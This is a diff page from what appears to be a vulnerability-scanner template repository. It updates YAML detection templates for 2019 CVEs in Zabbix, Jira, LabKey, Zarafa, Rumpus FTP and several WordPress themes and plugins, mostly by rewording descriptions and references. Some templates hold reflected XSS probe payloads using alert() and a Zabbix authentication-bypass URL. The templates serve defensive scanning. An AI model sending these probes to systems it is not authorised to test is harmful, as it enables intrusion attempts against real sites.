- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

2
cves/2019/CVE-2019-17382.yaml
View File

@ -7,7 +7,7 @@ info:
description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference:
- https://www.exploit-db.com/exploits/47467
- https://www.cvedetails.com/cve/CVE-2019-17382/
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1

1
cves/2019/CVE-2019-18665.yaml
View File

@ -9,7 +9,6 @@ info:
reference:
- https://atomic111.github.io/article/secudos-domos-directory_traversal
- https://vuldb.com/?id.144804
- https://www.cvedetails.com/cve/CVE-2019-18665
- https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
- https://nvd.nist.gov/vuln/detail/CVE-2019-18665
classification:

7
cves/2019/CVE-2019-19134.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2019-19134
info:
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
reference:
- https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
- https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
- https://heroplugins.com/product/maps/
- https://heroplugins.com/changelogs/hmaps/changelog.txt
- https://nvd.nist.gov/vuln/detail/CVE-2019-19134
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-19368.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
author: madrobot
severity: medium
description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
reference:
- https://github.com/harshit-shukla/CVE-2019-19368/
- https://www.maxum.com/Rumpus/Download.html
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-19908.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2019-19908
info:
name: phpMyChat-Plus - Cross-Site Scripting
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
words:
- "<script>alert(1337)</script>"
part: body
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-20141.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2019-20141
info:
name: Neon Dashboard - Cross-Site Scripting
name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
author: knassar702
severity: medium
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
reference:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
- https://knassar702.github.io/cve/neon/
- https://nvd.nist.gov/vuln/detail/CVE-2019-20141
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/31

2
cves/2019/CVE-2019-20183.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.2
cve-id: CVE-2019-20183
cwe-id: CWE-434
tags: upload,edb,cve,cve2019,rce,intrusive
tags: edb,cve,cve2019,rce,intrusive,fileupload
requests:
- raw:

8
cves/2019/CVE-2019-20210.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2019-20210
info:
name: CTHthemes CityBook < 2.3.4 - Reflected XSS
name: WordPress CTHthemes - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
reference:
- https://wpscan.com/vulnerability/10013
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
- https://wpvulndb.com/vulnerabilities/10018
- https://cxsecurity.com/issue/WLB-2019120112
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-3402.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2019-3402
info:
name: Jira - Reflected XSS using searchOwnerUserName parameter.
name: Jira <8.1.1 - Cross-Site Scripting
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -31,3 +32,5 @@ requests:
words:
- "<script>alert(1)</script>"
part: body
# Enhanced by mp on 2022/08/31

9
cves/2019/CVE-2019-3911.yaml
View File

@ -1,14 +1,13 @@
id: CVE-2019-3911
info:
name: LabKey Server < 18.3.0 - XSS
name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
author: princechaddha
severity: medium
description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
parameter in the /__r2/query endpoints.
description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
reference:
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3911
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/09/07

10
cves/2019/CVE-2019-7219.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2019-7219
info:
name: Zarafa WebApp Reflected XSS
name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
author: pdteam
severity: medium
description: |
Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://github.com/verifysecurity/CVE-2019-7219
- https://stash.kopano.io/repos?visibility=public
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -20,7 +22,6 @@ requests:
- method: GET
path:
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
matchers-condition: and
matchers:
- type: word
@ -31,7 +32,8 @@ requests:
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by cs on 2022/09/07

Some files were not shown because too many files have changed in this diff Show More